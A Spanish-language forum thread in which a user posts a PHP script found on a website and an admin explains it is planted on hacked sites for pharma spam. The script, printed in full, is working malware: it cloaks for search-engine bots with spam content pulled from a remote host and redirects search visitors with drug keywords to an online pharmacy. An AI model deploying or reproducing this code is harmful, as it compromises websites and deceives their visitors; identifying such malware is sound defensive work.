Encontre este script

kaptincho

kaptincho Seguir

Gamma
Verificación en dos pasos activada
Verificado por Whatsapp
Desde
20 Feb 2011
Mensajes
320
Encontre este script en una pagina

Insertar CODE, HTML o PHP: 
if (!defined('frmDs')){
	define('frmDs' ,1);
	error_reporting(0);
	
	function frm_dl ($url) {
		if (function_exists('curl_init')) {
			$ch = curl_init($url);
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
			$out = curl_exec ($ch);
			if (curl_errno($ch) !== 0) $out = false;
			curl_close ($ch);
		} else {$out = @file_get_contents($url);}
		return trim($out);
	}
	
	function frm_crpt($in){
		$il=strlen($in);$o='';
		for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
		return $o;
	}
	
	function frm_getcache($tmpdir,$link,$cmtime,$del=true){
		$f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
		if(!file_exists($f) || time() - filemtime($f) > 60 * $cmtime)
		{
			$dlc=frm_dl($link);
			if($dlc===false){
				if(del)
					@unlink($f);
				else
					@touch($f);
			}
			else 
			{
				if($fp = @fopen($f,'w')){
					fwrite($fp, frm_crpt($dlc)); fclose($fp);
				}else{return $dlc;}
			}
		}
		$fc = @file_get_contents($f);
		return ($fc)?frm_crpt($fc):'';
	}
	
	function frm_isbot(){
		$ua=@strtolower($_SERVER['HTTP_USER_AGENT']);
		if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; 
		$rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),
					array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),
					array(3481178113,3481182206),array(2915172353,2915237886));
		foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
		if(!$ua)return true;
		$bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
		foreach ($bots as $b) if(strpos($ua, $b)!==false) return true;
		$h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);
		$hba=array('google','msn','yahoo');
		if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true;
		return false;
	}
	
	function frm_tmpdir(){
		$fs = array('/tmp','/var/tmp');
        foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
            if ($t = getenv($v)) {$fs[]=$t;}
        }
        if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
        $fs[]='.';
		
        foreach ($fs as $f){
        	$tf = $f.'/'.md5(rand());
        	if($fp = @fopen($tf, 'w')){
        		fclose($fp);
        		unlink($tf);
        		return $f;
        	}
        }
		return false;
	}

	function frm_seref(){
		$r = @strtolower($_SERVER["HTTP_REFERER"]);
		$ses = array('google','bing','yahoo','ask','aol');
		foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
		return false;
	}
	
	function frm_isuniq($tdir){
		$ip=$_SERVER['REMOTE_ADDR'];
		$dbf=$tdir.'/sess_'.md5(date('m.y'));
		if(strpos(frm_crpt(@file_get_contents($dbf)),$ip) === false ){
			if ($fp=@fopen($dbf,'a')){fputs($fp,frm_crpt($ip.'|')); fclose($fp);}
			return true;
		}
		return false;
	}
		
	function frm_havekey(){
		$nks = array('cialis','cipro','clomi','diflucan','finasteride','fluconazole','furosemide','kamagra','lasix','levitra','propecia','sildenafil','tadalafil','vardenafil','viagra','zithrom');
		$k = @strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]);
		print_r($r);
		if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return false;
		foreach ($nks as $n)if(strpos($k, $n)!==false) return $n;

		return false;
	}
	
	$tdir = frm_tmpdir();

	$ua=$_SERVER['HTTP_USER_AGENT'];
	$isb=frm_isbot();
	$k=frm_havekey();
	//-------
	$host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));
	if($tdir && strlen($host)<100 && preg_match('/^[a-z0-9\-]+\.([a-z]{2,5}|[a-z]{2,3}\.[a-z]{2,3}|.*\.edu)$/', $host)){
		$parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p')))),0,3);
		$pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
		$ruri = strtolower($_SERVER['REQUEST_URI']);
		if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){
			if(!$isb && frm_seref()){
				print('<script>document.location=("http://pharmshopping.net'.($k?('/search.html?key='.$k):'').'");</script>');
			}
			print(frm_getcache($tdir,"http://dmuyitqmyrau.findhere.org/stat/feed.php?h=$host&p=$pageid&pa=$parg",60*24,false));
			exit();
		}
		if (($ruri=='/' || $ruri=='/index.php') && $isb) {
			print(frm_getcache($tdir,"http://dmuyitqmyrau.findhere.org/stat/feed.php?h=$host&pa=$parg&g=1",60*24,false));
			exit();
		}
	}
	//---------
	
	if(!$isb&&frm_seref()&&$k){
		header('Location: http://pharmshopping.net/search.html?key='.$k);exit();
	}
	

}

Alguien podria explicar que funcion cumple?
 
Cicklow

Cicklow

Admin
Dseda
Verificado
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
¡Usuario popular!
Suscripción a IA
Desde
30 May 2011
Mensajes
1.101
kaptincho dijo:
Encontre este script en una pagina
Hacer clic para expandir...

es usado cuando hackean webs... sive para detectar si viene del buscador buscando alguna key como cialis viagra y demas yerbas y redirecciona al sitio de una farmacia para que les compren...
 
Hay que estar conectado o registrado para responder aquí.
Arriba